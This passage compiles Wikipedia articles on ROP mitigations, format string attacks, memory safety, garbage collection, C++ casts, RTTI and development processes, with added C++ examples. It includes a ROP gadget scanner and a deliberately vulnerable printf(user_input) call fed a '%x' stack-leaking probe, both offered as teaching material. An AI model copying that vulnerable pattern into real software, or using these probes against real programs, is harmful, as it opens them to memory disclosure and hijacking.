return address) combined with a "local context" value (e.g., the stack pointer). Before performing a sensitive operation (i.e., returning to the saved pointer) the signature can be checked to detect tampering or usage in the incorrect context (e.g., leveraging a saved return address from an exploit trampoline context). Notably theApple A12chips used in iPhones have upgraded to ARMv8.3 and use PACs.Linuxgained support for pointer authentication within the kernel in version 5.7 released in 2020; support foruserspaceapplications was added in 2018.[27] In 2022, researchers at MIT published aside-channel attackagainst PACs dubbedPACMAN.[28] The ARMv8.5-A architecture introduces another new feature at the hardware level that explicitly identifies valid targets of branch instructions. The compiler inserts a special instruction, opcode named "BTI", at each expected landing point ofindirect branchinstructions. These identified branch destinations typically include function entry points and switch/case code blocks. BTI instructions are used in code memory pages which are marked as "guarded" by the compiler and the linker. Any indirect branch instruction landing, in a guarded page, at any instruction other than a BTI generates a fault. The identified destinations where a BTI instruction is inserted represent approximately 1% of all instructions in average application code. 
Therefore, using BTI increases the code size by roughly the same amount.[29] The gadgets used in a ROP attack may be located anywhere in the application code, so on average about 99% of gadgets begin with an instruction that is not a BTI.[citation needed] Branching to these gadgets consequently results in a fault. Because a ROP attack is built from a chain of multiple gadgets, the probability that every gadget in the chain falls within the roughly 1% of instructions that are BTIs is very low; for example, a chain of ten such gadgets would occur with probability on the order of 0.01^10 = 10^-20. PAC and BTI are complementary mechanisms for preventing control-flow hijacking via return-oriented and jump-oriented programming attacks: while PAC focuses on the source of a branch operation (a signed pointer), BTI focuses on the destination of the branch.[30]
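Returning to the gadget search described at the start of this passage, the following is a minimal sketch of the byte-level scan. The names (find_ret_gadgets, Gadget) are illustrative; a real tool such as ROPgadget additionally disassembles each candidate and discards byte runs that do not decode into useful instructions.

#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

struct Gadget {
    std::size_t start;   // offset of the first byte of the candidate gadget
    std::size_t length;  // bytes up to and including the 0xC3 return opcode
};

// Collect every byte run of up to max_len bytes that ends in 0xC3. On x86,
// each different starting offset may decode to a different instruction sequence.
std::vector<Gadget> find_ret_gadgets(const std::vector<std::uint8_t>& code,
                                     std::size_t max_len = 8) {
    std::vector<Gadget> gadgets;
    for (std::size_t i = 0; i < code.size(); ++i) {
        if (code[i] != 0xC3) continue;                         // not a near return
        for (std::size_t back = 1; back <= max_len && back <= i; ++back) {
            gadgets.push_back({i - back, back + 1});
        }
    }
    return gadgets;
}

int main() {
    // Toy "binary" containing two embedded return opcodes.
    std::vector<std::uint8_t> code = {0x58, 0x5B, 0xC3, 0x89, 0xD8, 0x5D, 0xC3};
    for (const Gadget& g : find_ret_gadgets(code)) {
        std::printf("candidate gadget at offset %zu, %zu bytes\n", g.start, g.length);
    }
}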
https://en.wikipedia.org/wiki/Return-oriented_programming
https://en.wikipedia.org/wiki/Jump-oriented_programming
Uncontrolled format stringis a type ofcode injectionvulnerabilitydiscovered around 1989 that can be used insecurity exploits.[1]Originally thought harmless, format string exploits can be used tocrasha program or to execute harmful code. The problem stems from the use ofunchecked user inputas theformat stringparameter in certainCfunctions that perform formatting, such asprintf(). A malicious user may use the%sand%xformat tokens, among others, to print data from thecall stackor possibly other locations in memory. One may also write arbitrary data to arbitrary locations using the%nformat token, which commandsprintf()and similar functions to write the number of bytes formatted to an address stored on the stack. A typical exploit uses a combination of these techniques to take control of theinstruction pointer(IP) of a process,[2]for example by forcing a program to overwrite the address of a library function or the return address on the stack with a pointer to some maliciousshellcode. The padding parameters to format specifiers are used to control the number of bytes output and the%xtoken is used to pop bytes from the stack until the beginning of the format string itself is reached. The start of the format string is crafted to contain the address that the%nformat token can then overwrite with the address of the malicious code to execute. This is a common vulnerability because format bugs were previously thought harmless and resulted in vulnerabilities in many common tools.MITRE'sCVEproject lists roughly 500 vulnerable programs as of June 2007, and a trend analysis ranks it the 9th most-reported vulnerability type between 2001 and 2006.[3] Format string bugs most commonly appear when a programmer wishes to output a string containing user supplied data (either to a file, to a buffer, or to the user). The programmer may mistakenly writeprintf(buffer)instead ofprintf("%s", buffer). The first version interpretsbufferas a format string, and parses any formatting instructions it may contain. The second version simply prints a string to the screen, as the programmer intended. Both versions behave identically in the absence of format specifiers in the string, which makes it easy for the mistake to go unnoticed by the developer. Format bugs arise because C's argument passing conventions are nottype-safe. In particular, thevarargsmechanism allowsfunctionsto accept any number of arguments (e.g.printf) by "popping" as manyargumentsoff thecall stackas they wish, trusting the early arguments to indicate how many additional arguments are to be popped, and of what types. Format string bugs can occur in other programming languages besides C, such as Perl, although they appear with less frequency and usually cannot be exploited to execute code of the attacker's choice.[4] Format bugs were first noted in 1989 by thefuzz testingwork done at the University of Wisconsin, which discovered an "interaction effect" in theC shell(csh) between itscommand historymechanism and an error routine that assumed safe string input.[5] The use of format string bugs as anattack vectorwas discovered in September 1999 byTymm Twillmanduring asecurity auditof theProFTPDdaemon.[6]The audit uncovered ansnprintfthat directly passed user-generated data without a format string. Extensive tests with contrived arguments to printf-style functions showed that use of this for privilege escalation was possible. 
This led to the first posting in September 1999 on theBugtraqmailing list regarding this class of vulnerabilities, including a basic exploit.[6]It was still several months, however, before the security community became aware of the full dangers of format string vulnerabilities as exploits for other software using this method began to surface. The first exploits that brought the issue to common awareness (by providing remote root access via code execution) were published simultaneously on theBugtraqlist in June 2000 byPrzemysław Frasunek[7]and a person using the nicknametf8.[8]They were shortly followed by an explanation, posted by a person using the nicknamelamagra.[9]"Format bugs" was posted to theBugtraqlist by Pascal Bouchareine in July 2000.[10]The seminal paper "Format String Attacks"[11]byTim Newshamwas published in September 2000 and other detailed technical explanation papers were published in September 2001 such asExploiting Format String Vulnerabilities, by teamTeso.[2] Many compilers can statically check format strings and produce warnings for dangerous or suspect formats. Inthe GNU Compiler Collection, the relevant compiler flags are,-Wall,-Wformat,-Wno-format-extra-args,-Wformat-security,-Wformat-nonliteral, and-Wformat=2.[12] Most of these are only useful for detecting bad format strings that are known at compile-time. If the format string may come from the user or from a source external to the application, the application must validate the format string before using it. Care must also be taken if the application generates or selects format strings on the fly. If the GNU C library is used, the-D_FORTIFY_SOURCE=2parameter can be used to detect certain types of attacks occurring at run-time. The-Wformat-nonliteralcheck is more stringent. Contrary to many other security issues, the root cause of format string vulnerabilities is relatively easy to detect in x86-compiled executables: Forprintf-family functions, proper use implies a separate argument for the format string and the arguments to be formatted. Faulty uses of such functions can be spotted by simply counting the number of arguments passed to the function; an "argument deficiency"[2]is then a strong indicator that the function was misused. Counting the number of arguments is often made easy on x86 due to a calling convention where the caller removes the arguments that were pushed onto the stack by adding to the stack pointer after the call, so a simple examination of the stack correction yields the number of arguments passed to theprintf-family function.'[2]
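The mistake described earlier, printf(buffer) instead of printf("%s", buffer), can be illustrated in a few lines. The function names are hypothetical, and the warning flags named above (for example -Wall -Wformat -Wformat-security) will flag the vulnerable call at compile time because its format string is not a literal.

#include <cstdio>

// BAD: user_input is interpreted as a format string; %x tokens in it read values
// the caller never supplied (flagged by -Wformat-security / -Wformat-nonliteral).
void log_message_vulnerable(const char* user_input) {
    std::printf(user_input);
    std::printf("\n");
}

// GOOD: user_input is treated purely as data.
void log_message_safe(const char* user_input) {
    std::printf("%s\n", user_input);
}

int main() {
    const char* attack = "%x %x %x %x";   // a benign probe that leaks stack/register values
    log_message_vulnerable(attack);       // prints whatever the %x conversions pick up
    log_message_safe(attack);             // prints the literal text "%x %x %x %x"
}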
https://en.wikipedia.org/wiki/Format_string_attack
Memory safetyis the state of being protected from varioussoftware bugsandsecurity vulnerabilitieswhen dealing withmemoryaccess, such asbuffer overflowsanddangling pointers.[1]For example,Javais said to be memory-safe because itsruntime error detectionchecks array bounds and pointer dereferences.[1]In contrast,CandC++allow arbitrarypointer arithmeticwith pointers implemented as direct memory addresses with no provision forbounds checking,[2]and thus are potentiallymemory-unsafe.[3] Memory errors were first considered in the context ofresource management (computing)andtime-sharingsystems, in an effort to avoid problems such asfork bombs.[4]Developments were mostly theoretical until theMorris worm, which exploited a buffer overflow infingerd.[5]The field ofcomputer securitydeveloped quickly thereafter, escalating with multitudes of newattackssuch as thereturn-to-libc attackand defense techniques such as thenon-executable stack[6]andaddress space layout randomization. Randomization prevents mostbuffer overflowattacks and requires the attacker to useheap sprayingor other application-dependent methods to obtain addresses, although its adoption has been slow.[5]However, deployments of the technology are typically limited to randomizing libraries and the location of the stack. In 2019, aMicrosoftsecurity engineer reported that 70% of all security vulnerabilities were caused by memory safety issues.[7]In 2020, a team atGooglesimilarly reported that 70% of all "severe security bugs" inChromiumwere caused by memory safety problems. Many other high-profile vulnerabilities and exploits in critical software have ultimately stemmed from a lack of memory safety, includingHeartbleed[8]and a long-standing privilege escalation bug insudo.[9]The pervasiveness and severity of vulnerabilities and exploits arising from memory safety issues have led several security researchers to describe identifying memory safety issues as"shooting fish in a barrel".[10] Some modern high-level programming languages are memory-safe by default[citation needed], though not completely since they only check their own code and not the system they interact with. Automaticmemory managementin the form ofgarbage collectionis the most common technique for preventing some of the memory safety problems, since it prevents common memory safety errors like use-after-free for all data allocated within the language runtime.[11]When combined with automaticbounds checkingon all array accesses and no support for rawpointerarithmetic, garbage collected languages provide strong memory safety guarantees (though the guarantees may be weaker for low-level operations explicitly marked unsafe, such as use of aforeign function interface). However, the performance overhead of garbage collection makes these languages unsuitable for certain performance-critical applications.[1] For languages that usemanual memory management, memory safety is not usually guaranteed by the runtime. Instead, memory safety properties must either be guaranteed by the compiler viastatic program analysisandautomated theorem provingor carefully managed by the programmer at runtime.[11]For example, theRust programming languageimplements a borrow checker to ensure memory safety,[12]whileCandC++provide no memory safety guarantees. 
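A short contrast between the unchecked access that C and C++ permit and a bounds-checked access that fails cleanly; this is a generic sketch of the distinction rather than a claim about any particular runtime.

#include <iostream>
#include <stdexcept>
#include <vector>

int main() {
    std::vector<int> v = {1, 2, 3};

    int* raw = v.data();
    std::cout << "unchecked read in bounds: " << raw[0] << '\n';
    // raw[10] = 42;   // out-of-bounds write: undefined behavior, no diagnostic required

    try {
        v.at(10) = 42;  // bounds-checked access: throws instead of corrupting memory
    } catch (const std::out_of_range& e) {
        std::cout << "caught: " << e.what() << '\n';
    }
}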
The substantial amount of software written in C and C++ has motivated the development of external static analysis tools likeCoverity, which offers static memory analysis for C.[13] DieHard,[14]its redesign DieHarder,[15]and theAllinea Distributed Debugging Toolare special heap allocators that allocate objects in their own random virtual memory page, allowing invalid reads and writes to be stopped and debugged at the exact instruction that causes them. Protection relies upon hardware memory protection and thus overhead is typically not substantial, although it can grow significantly if the program makes heavy use of allocation.[16]Randomization provides only probabilistic protection against memory errors, but can often be easily implemented in existing software by relinking the binary. The memcheck tool ofValgrinduses aninstruction set simulatorand runs the compiled program in a memory-checking virtual machine, providing guaranteed detection of a subset of runtime memory errors. However, it typically slows the program down by a factor of 40,[17]and furthermore must be explicitly informed of custom memory allocators.[18][19] With access to the source code, libraries exist that collect and track legitimate values for pointers ("metadata") and check each pointer access against the metadata for validity, such as theBoehm garbage collector.[20]In general, memory safety can be safely assured usingtracing garbage collectionand the insertion of runtime checks on every memory access; this approach has overhead, but less than that of Valgrind. All garbage-collected languages take this approach.[1]For C and C++, many tools exist that perform a compile-time transformation of the code to do memory safety checks at runtime, such as CheckPointer[21]andAddressSanitizerwhich imposes an average slowdown factor of 2.[22] BoundWarden is a new spatial memory enforcement approach that utilizes a combination of compile-time transformation and runtime concurrent monitoring techniques.[23] Fuzz testingis well-suited for finding memory safety bugs and is often used in combination with dynamic checkers such as AddressSanitizer. Many different types of memory errors can occur:[24][25] Depending on the language and environment, other types of bugs can contribute to memory unsafety: Some lists may also includerace conditions(concurrent reads/writes to shared memory) as being part of memory safety (e.g., for access control). The Rust programming language prevents many kinds of memory-based race conditions by default, because it ensures there is at most one writerorone or more readers. Many other programming languages, such as Java, donotautomatically prevent memory-based race conditions, yet are still generally considered "memory safe" languages. Therefore, countering race conditions is generallynotconsidered necessary for a language to be considered memory safe.
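As an illustration of the runtime checkers discussed above, the following program contains a use-after-free. Built normally, the commented-out read would be undefined behavior and might appear to "work"; built with AddressSanitizer (for example, g++ -fsanitize=address -g), the bad access is reported at the faulting instruction.

#include <iostream>

int main() {
    int* p = new int(42);
    std::cout << "before free: " << *p << '\n';
    delete p;
    // std::cout << *p << '\n';   // heap-use-after-free: uncomment to see the sanitizer report
    p = nullptr;                  // nulling the pointer avoids accidental reuse
    std::cout << "done\n";
}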
https://en.wikipedia.org/wiki/Memory_safety
Incomputer science,garbage collection(GC) is a form of automaticmemory management.[2]Thegarbage collectorattempts to reclaim memory that was allocated by the program, but is no longer referenced; such memory is calledgarbage. Garbage collection was invented by American computer scientistJohn McCarthyaround 1959 to simplify manual memory management inLisp.[3] Garbage collection relieves the programmer from doingmanual memory management, where the programmer specifies what objects to de-allocate and return to the memory system and when to do so.[2]Other, similar techniques includestack allocation,region inference, and memory ownership, and combinations thereof. Garbage collection may take a significant proportion of a program's total processing time, and affectperformanceas a result. Resources other than memory, such asnetwork sockets, databasehandles,windows,filedescriptors, and device descriptors, are not typically handled by garbage collection, but rather by othermethods(e.g.destructors). Some such methods de-allocate memory also. Manyprogramming languagesrequire garbage collection, either as part of thelanguage specification(e.g.,RPL,Java,C#,D,[4]Go, and mostscripting languages) or effectively for practical implementation (e.g., formal languages likelambda calculus).[5]These are said to begarbage-collected languages. Other languages, such asCandC++, were designed for use with manual memory management, but have garbage-collected implementations available. Some languages, likeAda,Modula-3, andC++/CLI, allow both garbage collection andmanual memory managementto co-exist in the same application by using separateheapsfor collected and manually managed objects. Still others, likeD, are garbage-collected but allow the user to manually delete objects or even disable garbage collection entirely when speed is required.[6] Although many languages integrate GC into theircompilerandruntime system,post-hocGC systems also exist, such asAutomatic Reference Counting(ARC). Some of thesepost-hocGC systems do not require recompilation.[7] GC frees the programmer from manually de-allocating memory. This helps avoid some kinds oferrors:[8] GC uses computing resources to decide which memory to free. Therefore, the penalty for the convenience of not annotating object lifetime manually in the source code isoverhead, which can impair program performance.[11]A peer-reviewed paper from 2005 concluded that GC needs five times the memory to compensate for this overhead and to perform as fast as the same program using idealized explicit memory management. The comparison however is made to a program generated by inserting deallocation calls using anoracle, implemented by collecting traces from programs run under aprofiler, and the program is only correct for one particular execution of the program.[12]Interaction withmemory hierarchyeffects can make this overhead intolerable in circumstances that are hard to predict or to detect in routine testing. The impact on performance was given by Apple as a reason for not adopting garbage collection iniOS, despite it being the most desired feature.[13] The moment when the garbage is actually collected can be unpredictable, resulting in stalls (pauses to shift/free memory) scattered throughout asession. Unpredictable stalls can be unacceptable inreal-time environments, intransaction processing, or in interactive programs. Incremental, concurrent, and real-time garbage collectors address these problems, with varying trade-offs. 
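To make the basic model concrete, here is a minimal sketch using the Boehm conservative collector for C and C++ (mentioned later in this passage). It assumes libgc is installed and linked (-lgc); on some systems the header is installed as <gc/gc.h> rather than <gc.h>.

#include <gc.h>
#include <cstdio>

int main() {
    GC_INIT();                                              // initialize the collector
    long checksum = 0;
    for (int i = 0; i < 100000; ++i) {
        // Allocate from the collected heap; there is no corresponding free().
        int* block = static_cast<int*>(GC_MALLOC(100 * sizeof(int)));
        block[0] = i;
        checksum += block[0];
    }
    // Blocks that became unreachable during the loop are reclaimed automatically.
    std::printf("allocated 100000 blocks, checksum %ld\n", checksum);
}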
Tracing garbage collection is the most common type of garbage collection, so much so that "garbage collection" often refers to tracing garbage collection rather than other methods such as reference counting. The overall strategy consists of determining which objects should be garbage collected by tracing which objects are reachable by a chain of references from certain root objects, and considering the rest as garbage and collecting them. However, there are a large number of algorithms used in implementation, with widely varying complexity and performance characteristics. Reference counting garbage collection is a technique in which each object keeps a count of the number of references to it. Garbage is identified by having a reference count of zero. An object's reference count is incremented when a reference to it is created and decremented when a reference is destroyed. When the count reaches zero, the object's memory is reclaimed.[14] As with manual memory management, and unlike tracing garbage collection, reference counting guarantees that objects are destroyed as soon as their last reference is destroyed, and it usually only accesses memory which is either in CPU caches, in objects to be freed, or directly pointed to by those, and thus tends not to have significant negative side effects on CPU cache and virtual memory operation. Reference counting has a number of disadvantages, most notably its inability on its own to reclaim reference cycles (see the brief illustration below); these can generally be solved or mitigated by more sophisticated algorithms. Escape analysis is a compile-time technique that can convert heap allocations to stack allocations, thereby reducing the amount of garbage collection to be done. This analysis determines whether an object allocated inside a function is accessible outside of it. If a function-local allocation is found to be accessible to another function or thread, the allocation is said to "escape" and cannot be done on the stack. Otherwise, the object may be allocated directly on the stack and released when the function returns, bypassing the heap and associated memory management costs.[21] Generally speaking, higher-level programming languages are more likely to have garbage collection as a standard feature. In some languages lacking built-in garbage collection, it can be added through a library, as with the Boehm garbage collector for C and C++. Most functional programming languages, such as ML, Haskell, and APL, have garbage collection built in. Lisp is especially notable as both the first functional programming language and the first language to introduce garbage collection.[22] Other dynamic languages, such as Ruby, Julia, JavaScript, and ECMAScript, also tend to use GC (but not Perl 5 or PHP before version 5.3,[23] which both use reference counting). Object-oriented programming languages such as Smalltalk, ooRexx, RPL, and Java usually provide integrated garbage collection. Notable exceptions are C++ and Delphi, which have destructors. BASIC and Logo have often used garbage collection for variable-length data types, such as strings and lists, so as not to burden programmers with memory management details.
On theAltair 8800, programs with many string variables and little string space could cause long pauses due to garbage collection.[24]Similarly theApplesoft BASICinterpreter's garbage collection algorithm repeatedly scans the string descriptors for the string having the highest address in order to compact it toward high memory, resulting inO(n2){\displaystyle O(n^{2})}performance[25]and pauses anywhere from a few seconds to a few minutes.[26]A replacement garbage collector for Applesoft BASIC byRandy Wiggintonidentifies a group of strings in every pass over the heap, reducing collection time dramatically.[27]BASIC.SYSTEM, released withProDOSin 1983, provides a windowing garbage collector for BASIC that is many times faster.[28] While theObjective-Ctraditionally had no garbage collection, with the release ofOS X 10.5in 2007Appleintroduced garbage collection forObjective-C2.0, using an in-house developed runtime collector.[29]However, with the 2012 release ofOS X 10.8, garbage collection was deprecated in favor ofLLVM'sautomatic reference counter(ARC) that was introduced withOS X 10.7.[30]Furthermore, since May 2015 Apple even forbade the usage of garbage collection for new OS X applications in theApp Store.[31][32]ForiOS, garbage collection has never been introduced due to problems in application responsivity and performance;[13][33]instead, iOS uses ARC.[34][35] Garbage collection is rarely used onembeddedor real-time systems because of the usual need for very tight control over the use of limited resources. However, garbage collectors compatible with many limited environments have been developed.[36]The Microsoft.NET Micro Framework, .NET nanoFramework[37]andJava Platform, Micro Editionare embedded software platforms that, like their larger cousins, include garbage collection. Garbage collectors available inJavaOpenJDKsvirtual machine (JVM) include: Compile-time garbage collection is a form ofstatic analysisallowing memory to be reused and reclaimed based on invariants known during compilation. This form of garbage collection has been studied in theMercury programming language,[39]and it saw greater usage with the introduction ofLLVM'sautomatic reference counter(ARC) into Apple's ecosystem (iOS and OS X) in 2011.[34][35][31] Incremental, concurrent, and real-time garbage collectors have been developed, for example byHenry Bakerand byHenry Lieberman.[40][41][42] In Baker's algorithm, the allocation is done in either half of a single region of memory. When it becomes half full, a garbage collection is performed which moves the live objects into the other half and the remaining objects are implicitly deallocated. The running program (the 'mutator') has to check that any object it references is in the correct half, and if not move it across, while a background task is finding all of the objects.[43] Generational garbage collectionschemes are based on the empirical observation that most objects die young. In generational garbage collection, two or more allocation regions (generations) are kept, which are kept separate based on the object's age. New objects are created in the "young" generation that is regularly collected, and when a generation is full, the objects that are still referenced from older regions are copied into the next oldest generation. Occasionally a full scan is performed. Somehigh-level language computer architecturesinclude hardware support for real-time garbage collection. 
Most implementations of real-time garbage collectors usetracing.[citation needed]Such real-time garbage collectors meethard real-timeconstraints when used with a real-time operating system.[44]
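The reference counting strategy described earlier in this passage can be illustrated directly in C++ with std::shared_ptr: the first block shows an object reclaimed as soon as its count reaches zero, and the second shows the classic limitation of naive reference counting, a cycle whose counts never reach zero (std::weak_ptr is the usual remedy).

#include <iostream>
#include <memory>

struct Node {
    std::shared_ptr<Node> next;
    ~Node() { std::cout << "Node destroyed\n"; }
};

int main() {
    {
        auto a = std::make_shared<Node>();
        std::cout << "use count = " << a.use_count() << '\n';   // 1
    }   // count drops to zero here, so the destructor runs immediately

    {
        auto a = std::make_shared<Node>();
        auto b = std::make_shared<Node>();
        a->next = b;
        b->next = a;   // reference cycle: the counts never reach zero
    }   // neither destructor runs; the two nodes are leaked
    std::cout << "end of main\n";
}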
https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)
In the C++ programming language, static_cast is an operator that performs an explicit type conversion.[1] The type parameter must be a data type to which the object can be converted via a known method, whether a built-in conversion or a user-defined one. The type can be a reference or an enumerator. All types of conversions that are well-defined and allowed by the compiler are performed using static_cast.[2][failed verification] The static_cast<> operator can be used for operations such as converting between numeric types, restoring a pointer from void*, and navigating a class hierarchy whose relationships are known at compile time (see the sketch below). Although static_cast conversions are checked at compile time to prevent obvious incompatibilities, no run-time type checking is performed that would prevent a cast between incompatible data types, such as pointers. A static_cast from a pointer to a class B to a pointer to a derived class D is ill-formed if B is an inaccessible or ambiguous base of D. A static_cast from a pointer to a virtual base class (or a base class of a virtual base class) to a pointer to a derived class is ill-formed.
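A sketch of a few conversions commonly written with static_cast, including a downcast that receives no run-time check; the class names are illustrative.

#include <iostream>

struct Base { virtual ~Base() = default; };
struct Derived : Base { int value = 7; };

int main() {
    double d = 3.9;
    int i = static_cast<int>(d);                  // numeric conversion; truncates to 3

    int x = 42;
    void* vp = &x;
    int* ip = static_cast<int*>(vp);              // restore the pointer's original type

    Derived derived;
    Base* base = &derived;
    Derived* down = static_cast<Derived*>(base);  // no run-time check: the programmer
                                                  // must know base really points at a Derived
    std::cout << i << ' ' << *ip << ' ' << down->value << '\n';
}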
https://en.wikipedia.org/wiki/Static_cast
In computer programming, run-time type information or run-time type identification (RTTI)[1] is a feature of some programming languages (such as C++,[2] Object Pascal, and Ada[3]) that exposes information about an object's data type at runtime. Run-time type information may be available for all types or only for types that explicitly have it (as is the case with Ada). Run-time type information is a specialization of a more general concept called type introspection. In the original C++ design, Bjarne Stroustrup did not include run-time type information, because he thought this mechanism was often misused.[4] In C++, RTTI can be used to do safe typecasts using the dynamic_cast<> operator, and to manipulate type information at runtime using the typeid operator and std::type_info class. In Object Pascal, RTTI can be used to perform safe type casts with the as operator, test the class to which an object belongs with the is operator, and manipulate type information at run time with classes contained in the RTTI unit[5] (i.e. classes: TRttiContext, TRttiInstanceType, etc.). In Ada, objects of tagged types also store a type tag, which permits the identification of the type of these objects at runtime. The in operator can be used to test, at runtime, whether an object is of a specific type and may be safely converted to it.[6] RTTI is available only for classes that are polymorphic, which means they have at least one virtual method. In practice, this is not a limitation because base classes must have a virtual destructor to allow objects of derived classes to perform proper cleanup if they are deleted from a base pointer. Some compilers have flags to disable RTTI. Using these flags may reduce the overall size of the application, making them especially useful when targeting systems with a limited amount of memory.[7] The typeid reserved word (keyword) is used to determine the class of an object at runtime. It returns a reference to a std::type_info object, which exists until the end of the program.[8] The use of typeid, in a non-polymorphic context, is often preferred over dynamic_cast<class_type> in situations where just the class information is needed, because typeid is always a constant-time procedure, whereas dynamic_cast may need to traverse the class derivation lattice of its argument at runtime.[citation needed] Some aspects of the returned object are implementation-defined, such as std::type_info::name(), and cannot be relied on across compilers to be consistent. Objects of class std::bad_typeid are thrown when the expression for typeid is the result of applying the unary * operator on a null pointer. Whether an exception is thrown for other null reference arguments is implementation-dependent; in other words, for the exception to be guaranteed, the expression must take the form typeid(*p) where p is any expression resulting in a null pointer. The exact output of typeid-based code varies by system and compiler (a sketch appears at the end of this passage). The dynamic_cast operator in C++ is used for downcasting a reference or pointer to a more specific type in the class hierarchy. Unlike static_cast, the target of a dynamic_cast must be a pointer or reference to a class. Unlike static_cast and C-style casts (where the type check is made at compile time), a type safety check is performed at runtime. If the types are not compatible, an exception will be thrown (when dealing with references) or a null pointer will be returned (when dealing with pointers).
A Java typecast behaves similarly; if the object being cast is not actually an instance of the target type, and cannot be converted to one by a language-defined method, an instance of java.lang.ClassCastException will be thrown.[9] Suppose some function takes an object of type A as its argument, and wishes to perform some additional operation if the object passed is an instance of B, a subclass of A. This can be done using dynamic_cast on a reference, and a similar version of MyFunction can be written with pointers instead of references (both variants are sketched below). In Object Pascal and Delphi, the is operator is used to check the type of a class at runtime. It tests whether an object belongs to a given class, including classes of individual ancestors present in the inheritance hierarchy tree (e.g. Button1 is a TButton class that has ancestors: TWinControl → TControl → TComponent → TPersistent → TObject, where the latter is the ancestor of all classes). The as operator is used when an object needs to be treated at run time as if it belonged to an ancestor class. The RTTI unit is used to manipulate object type information at run time. This unit contains a set of classes that allow you to get information about an object's class and its ancestors, properties, methods, and events, to change property values, and to call methods. A typical use of the RTTI unit is to obtain information about the class to which an object belongs, to create an instance of it, and to call its methods; such an example would assume that a TSubject class has been declared in a unit named SubjectUnit.
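A minimal sketch of the kind of function described above, using the names A, B, and MyFunction from the text; the reference form throws std::bad_cast on a mismatch, the pointer form returns a null pointer, and typeid is shown reporting the dynamic type (its name() strings are implementation-defined).

#include <iostream>
#include <typeinfo>

struct A { virtual ~A() = default; };
struct B : A { void b_only() const { std::cout << "B-specific behavior\n"; } };

void MyFunction(A& obj) {
    std::cout << "dynamic type: " << typeid(obj).name() << '\n';   // reports A or B
    try {
        B& b = dynamic_cast<B&>(obj);   // throws std::bad_cast if obj is not a B
        b.b_only();
    } catch (const std::bad_cast&) {
        std::cout << "not a B (reference cast threw)\n";
    }
}

void MyFunctionPtr(A* obj) {
    if (B* b = dynamic_cast<B*>(obj)) { // yields a null pointer if obj is not a B
        b->b_only();
    } else {
        std::cout << "not a B (pointer cast returned null)\n";
    }
}

int main() {
    A a;
    B b;
    MyFunction(a);
    MyFunction(b);
    MyFunctionPtr(&a);
    MyFunctionPtr(&b);
}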
https://en.wikipedia.org/wiki/Dynamic_cast
Insoftware engineering, asoftware development processorsoftware development life cycle(SDLC) is a process of planning and managingsoftware development. It typically involves dividing software development work into smaller, parallel, or sequential steps or sub-processes to improvedesignand/orproduct management. The methodology may include the pre-definition of specificdeliverablesand artifacts that are created and completed by a project team to develop or maintain an application.[1] Most modern development processes can be vaguely described asagile. Other methodologies includewaterfall,prototyping,iterative and incremental development,spiral development,rapid application development, andextreme programming. A life-cycle "model" is sometimes considered a more general term for a category of methodologies and a software development "process" is a particular instance as adopted by a specific organization.[citation needed]For example, many specific software development processes fit the spiral life-cycle model. The field is often considered a subset of thesystems development life cycle. The software development methodology framework did not emerge until the 1960s. According to Elliott (2004), thesystems development life cyclecan be considered to be the oldest formalized methodology framework for buildinginformation systems. The main idea of the software development life cycle has been "to pursue the development of information systems in a very deliberate, structured and methodical way, requiring each stage of the life cycle––from the inception of the idea to delivery of the final system––to be carried out rigidly and sequentially"[2]within the context of the framework being applied. The main target of this methodology framework in the 1960s was "to develop large scale functionalbusiness systemsin an age of large scale business conglomerates. Information systems activities revolved around heavydata processingandnumber crunchingroutines."[2] Requirements gathering and analysis:The first phase of the custom software development process involves understanding the client's requirements and objectives. This stage typically involves engaging in thorough discussions and conducting interviews with stakeholders to identify the desired features, functionalities, and overall scope of the software. The development team works closely with the client to analyze existing systems and workflows, determine technical feasibility, and define project milestones. Planning and design:Once the requirements are understood, the custom software development team proceeds to create a comprehensive project plan. This plan outlines the development roadmap, including timelines, resource allocation, and deliverables. The software architecture and design are also established during this phase. User interface (UI) and user experience (UX) design elements are considered to ensure the software's usability, intuitiveness, and visual appeal. Development:With the planning and design in place, the development team begins the coding process. This phase involveswriting, testing, and debugging the software code. Agile methodologies, such as scrum or kanban, are often employed to promote flexibility, collaboration, and iterative development. Regular communication between the development team and the client ensures transparency and enables quick feedback and adjustments. Testing and quality assurance:To ensure the software's reliability, performance, and security, rigorous testing and quality assurance (QA) processes are carried out. 
Different testing techniques, including unit testing, integration testing, system testing, and user acceptance testing, are employed to identify and rectify any issues or bugs. QA activities aim to validate the software against the predefined requirements, ensuring that it functions as intended. Deployment and implementation:Once the software passes the testing phase, it is ready for deployment and implementation. The development team assists the client in setting up the software environment, migrating data if necessary, and configuring the system. User training and documentation are also provided to ensure a smooth transition and enable users to maximize the software's potential. Maintenance and support:After the software is deployed, ongoing maintenance and support become crucial to address any issues, enhance performance, and incorporate future enhancements. Regular updates, bug fixes, and security patches are released to keep the software up-to-date and secure. This phase also involves providing technical support to end users and addressing their queries or concerns. Methodologies, processes, and frameworks range from specific prescriptive steps that can be used directly by an organization in day-to-day work, to flexible frameworks that an organization uses to generate a custom set of steps tailored to the needs of a specific project or group. In some cases, a "sponsor" or "maintenance" organization distributes an official set of documents that describe the process. Specific examples include: Since DSDM in 1994, all of the methodologies on the above list except RUP have been agile methodologies - yet many organizations, especially governments, still use pre-agile processes (often waterfall or similar). Software process andsoftware qualityare closely interrelated; some unexpected facets and effects have been observed in practice.[3] Among these, another software development process has been established inopen source. The adoption of these best practices known and established processes within the confines of a company is calledinner source. Software prototypingis about creating prototypes, i.e. incomplete versions of the software program being developed. The basic principles are:[1] A basic understanding of the fundamental business problem is necessary to avoid solving the wrong problems, but this is true for all software methodologies. "Agile software development" refers to a group of software development frameworks based on iterative development, where requirements and solutions evolve via collaboration between self-organizing cross-functional teams. The term was coined in the year 2001 when theAgile Manifestowas formulated. Agile software development uses iterative development as a basis but advocates a lighter and more people-centric viewpoint than traditional approaches. Agile processes fundamentally incorporate iteration and the continuous feedback that it provides to successively refine and deliver a software system. The Agile model also includes the following software development processes: Continuous integrationis the practice of merging all developer working copies to a sharedmainlineseveral times a day.[4]Grady Boochfirst named and proposed CI inhis 1991 method,[5]although he did not advocate integrating several times a day.Extreme programming(XP) adopted the concept of CI and did advocate integrating more than once per day – perhaps as many as tens of times per day. 
Various methods are acceptable for combining linear and iterative systems development methodologies, with the primary objective of each being to reduce inherent project risk by breaking a project into smaller segments and providing more ease of change during the development process. There are three main variants of incremental development:[1]

